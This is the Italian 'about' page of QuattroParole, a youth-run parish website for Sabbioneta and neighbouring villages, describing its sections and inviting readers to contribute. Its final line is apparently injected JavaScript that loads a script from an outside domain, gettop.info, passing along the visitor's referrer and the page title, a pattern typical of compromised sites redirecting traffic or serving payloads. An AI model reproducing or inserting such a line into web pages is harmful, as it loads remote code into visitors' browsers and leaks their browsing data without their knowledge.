Cos’è QuattroParole

Barker-6aa

QuattroParole è il sito della Comunità Parrocchiale di Sabbioneta, Breda Cisoni, Ponteterra e Villa Pasquali. Nasce come sito parrocchiale, ma con la vocazione di guardare molto, molto più in là. E’ la nostra finestra sul mondo, e vuole testimoniare la voglia della comunità di dire la propria opinione e far valere il proprio punto di vista. E’ un sito creato dai giovani, in primis per gli altri giovani, ma anche per tutto il resto della comunità.

Di sicuro, QuattroParole non è il classico sito parrocchiale. Certo, c’è la sezione Parrocchie, con le novità sugli eventi parrocchiali, le fotogallery, i video, gli articoli su tutto ciò che accade all’Oratorio e nelle quattro parrocchie della Comunità. Ma non è tutto.

Nel tempo QuattroParole si è distinto per essere diverso dagli altri siti parrocchiali: è aperto a tutto. Ospita recensioni di film, serie tv, album musicali, libri e videogames. Tratta di attualità, tecnologia, sport. Non ha un tema preciso, ma tratta ogni argomento e novità potenzialmente interessante e curioso. Tutto a discrezione dei propri autori. E con la nuova versione 2014, QuattroParole si spinge ancora più in là, con la rubrica The Weekender, RadioParole e tanto altro in arrivo.

Chi scrive QuattroParole?

Bè, in primis, TU. QuattroParole è nato per dar spazio ai suoi lettori, per dar loro la possibilità di scrivere gli articoli e di parlare degli argomenti che stanno loro più a cuore. Insistiamo, come sempre, perchè il sito sia sempre più attivo, e affinchè i lettori diventino anche scrittori (per farlo, tra l’altro, vi basta andare qui).

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;